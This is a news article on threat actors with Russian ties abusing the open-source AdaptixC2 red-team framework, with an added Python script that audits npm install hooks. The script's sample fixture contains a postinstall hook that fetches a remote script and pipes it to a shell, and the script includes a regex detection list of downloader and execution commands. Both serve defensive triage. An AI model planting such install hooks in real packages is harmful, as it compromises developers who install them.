Threat researchers with cybersecurity firm Silent Push are linking bad actors with heavy ties to the Russian underworld to the abuse of AdaptixC2, a free open source tool commonly used by red teams to assess the security of organizations.
AdaptixC2, which is available on GitHub, is the latest in a growing list of open and ethical security-testing tools used by security teams to simulate attacks that threat groups have also adopted for their malicious operations. Researchers from Silent Push and other cybersecurity companies have been tracking the growing abuse of the tool in ransomware and other campaigns this year.
Silent Push last month reported detecting a new malware loader called CountLoader that is associated with Russian ransomware gangs and was observed dropping several malware agents, including AdaptixC2 and Cobalt Strike, another legitimate red-teaming tool that for years has been used by bad actors in campaigns.
At the time, the researchers said CountLoader was being used by either an initial access broker or a ransomware affiliate with ties to the high-profile ransomware groups LockBit, BlackBasta, and Qilin. The AdaptixC2 server is written in Go, which is popular among bad actors for its flexibility. The GUI client is written in C++ and Qt, enabling it to run on Linux, Windows, and macOS systems.
In the wake of the CountLoader investigation, Silent Push created signatures to detect AdaptixC2. Researchers have since found that a person who goes by the handle “RalfHacker” has made the most changes to the AdaptixC2 Framework repository on GitHub. Following that lead, they found that RalfHacker describes himself as a penetration tester, red team operator, and malware developer.
Email addresses link RalfHacker to a known hacking forum.
“A Telegram account then led us to a large Telegram group, named after ‘Ralf Hacker,’ advertising the v0.6 update to AdaptixC2 with a pinned message in Russian containing hashtags related to Active Directory and (roughly machine-translated) APT & ATM materials/resources,” the researchers wrote.
They noted that most of RalfHacker’s announcements are written in Russian, which aligns with the strong Russian ties the researchers found while investigating CountLoader, though they cautioned that this by itself is not a definitive link.
“Based on the information we have available, there is insufficient evidence for us to conclusively determine the extent of RalfHacker’s involvement in malicious activity tied to AdaptixC2 or CountLoader at this time,” they wrote. “However, threat actors often mask their cyber criminal activities under the guise of ‘red teaming,’ or ‘ethical hacking,’ when communicating publicly with other threat actors. RalfHacker’s own page aligns with this practice, featuring the brazen ‘maldev’ advertisement.”
Other threat intelligence teams also have been tracking the abuse of AdaptixC2. The DFIR Report in August found that AdaptixC2 was being used by an affiliate of the Akira ransomware group, and researchers with Palo Alto Networks’ Unit 42 team a month later wrote that they had observed the red-teaming tool being used in May to infect systems through such scenarios as fake help desk calls and an AI-generated PowerShell script.
“Our telemetry and threat intelligence show that AdaptixC2 is becoming more common,” they wrote. “We continue to identify new AdaptixC2 servers, suggesting that more threat actors are adopting this framework as part of their attack toolkit.”
Earlier this month, Kaspersky’s Securelist team found that AdaptixC2 agents were also being distributed through the npm package registry. They wrote that “threat actors are increasingly exploiting the trusted open-source supply chain to distribute post-exploitation framework agents and other forms of malware. Users and organizations involved in development or using open-source software from ecosystems like npm in their products are susceptible to this threat type.”
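A practical first check against install-time payloads of the kind described above is to inventory which dependencies run code during npm install at all. The script below is an added example, not code from the article, from Kaspersky, or from the AdaptixC2 project, and it does not detect AdaptixC2 specifically: it walks node_modules, lists every package that declares a preinstall, install, postinstall or prepare script, and flags scripts matching an assumed set of risky patterns (downloaders, shell one-liners, decoding, child_process). The pattern list, the package names and the sample project tree it builds are all constructed for illustration.

```python
"""Inventory and flag npm lifecycle scripts under node_modules.

Added example (not from the article or any vendor report). Heuristics and
sample packages are assumptions chosen for illustration only.
"""
import json
import os
import re
import tempfile
from pathlib import Path

# Hooks that npm runs automatically during install.
LIFECYCLE = ("preinstall", "install", "postinstall", "prepare")

# Assumed heuristic patterns for install scripts worth a second look.
RISKY = re.compile(
    r"(curl|wget|Invoke-WebRequest|\biwr\b|certutil|powershell|"
    r"base64|atob\(|node\s+-e|eval\(|child_process|\.exe\b|chmod\s+\+x)",
    re.IGNORECASE,
)


def find_package_manifests(root: Path):
    """Yield every package.json below root/node_modules, nested deps included."""
    for dirpath, _dirnames, filenames in os.walk(root / "node_modules"):
        if "package.json" in filenames:
            yield Path(dirpath) / "package.json"


def audit_manifest(manifest: Path):
    """Return (package, hook, script, risky) for each lifecycle script declared."""
    try:
        data = json.loads(manifest.read_text(encoding="utf-8"))
    except (OSError, ValueError):
        return []  # unreadable or malformed manifest: nothing to report
    name = data.get("name") or manifest.parent.name
    scripts = data.get("scripts") or {}
    return [
        (name, hook, scripts[hook], bool(RISKY.search(scripts[hook])))
        for hook in LIFECYCLE
        if isinstance(scripts.get(hook), str)
    ]


def audit_project(root):
    """Collect lifecycle-script findings for a whole project tree."""
    root = Path(root)
    findings = []
    for manifest in find_package_manifests(root):
        findings.extend(audit_manifest(manifest))
    return findings


def risky_packages(root):
    """Sorted names of packages whose install scripts matched a risky pattern."""
    return sorted({name for name, _, _, risky in audit_project(root) if risky})


def make_sample_project(base=None):
    """Constructed sample tree: one benign package, one with a downloader hook."""
    base = Path(base) if base else Path(tempfile.mkdtemp())
    benign = base / "node_modules" / "left-pad-ish"
    benign.mkdir(parents=True, exist_ok=True)
    (benign / "package.json").write_text(json.dumps({
        "name": "left-pad-ish", "version": "1.0.0",
        "scripts": {"test": "node test.js"},  # no lifecycle hook
    }))
    bad = base / "node_modules" / "@scope" / "build-helper"
    bad.mkdir(parents=True, exist_ok=True)
    (bad / "package.json").write_text(json.dumps({
        "name": "@scope/build-helper", "version": "0.1.3",
        "scripts": {"postinstall":
                    "node -e \"require('child_process')"
                    ".exec('curl -s http://example.invalid/a | sh')\""},
    }))
    return base


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else make_sample_project()
    for name, hook, script, risky in audit_project(target):
        print(f"{'!!' if risky else '  '} {name:28} {hook:11} {script}")
```

Run it against a real checkout with `python audit_hooks.py /path/to/project`; every line is a package that executes code on install, and `!!` lines deserve a manual read of the script before the next install. Pair this with `npm install --ignore-scripts` in CI and review the flagged hooks out of band, since the regex is only a triage aid and will miss obfuscated scripts.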
Trend Micro researchers last year outlined the growing trend of bad actors abusing legitimate ethical security tools in their operations.
“The integration of red teaming techniques into the cybersecurity strategy playbook has been an important step for organizations to enhance their defenses by allowing them to identify potential security gaps via simulated adversarial attacks,” they wrote. “However, the dual-use nature of these tools also poses risks, as they can be repurposed by malicious actors for nefarious purposes.”
The researchers noted that AI and machine learning can be used to better detect and respond to threats posed by the abuse of open tools in repositories, adding that they can reduce analysis time and help prioritize projects, which leads to faster and more effective response.
“It is essential for red teaming methodologies to continuously evolve in tandem with proactive detection and ethical considerations,” they wrote. “Shifting from a reactive approach – where tools are addressed as they become popular among cybercriminals – to a proactive stance that involves constant monitoring for emerging and high-risk tools will allow organizations to protect themselves better from the risks posed by cyber threats.”
In its report, Trend Micro researchers took a deeper dive into cybercriminals’ use of such technologies and methodologies for managing the threat.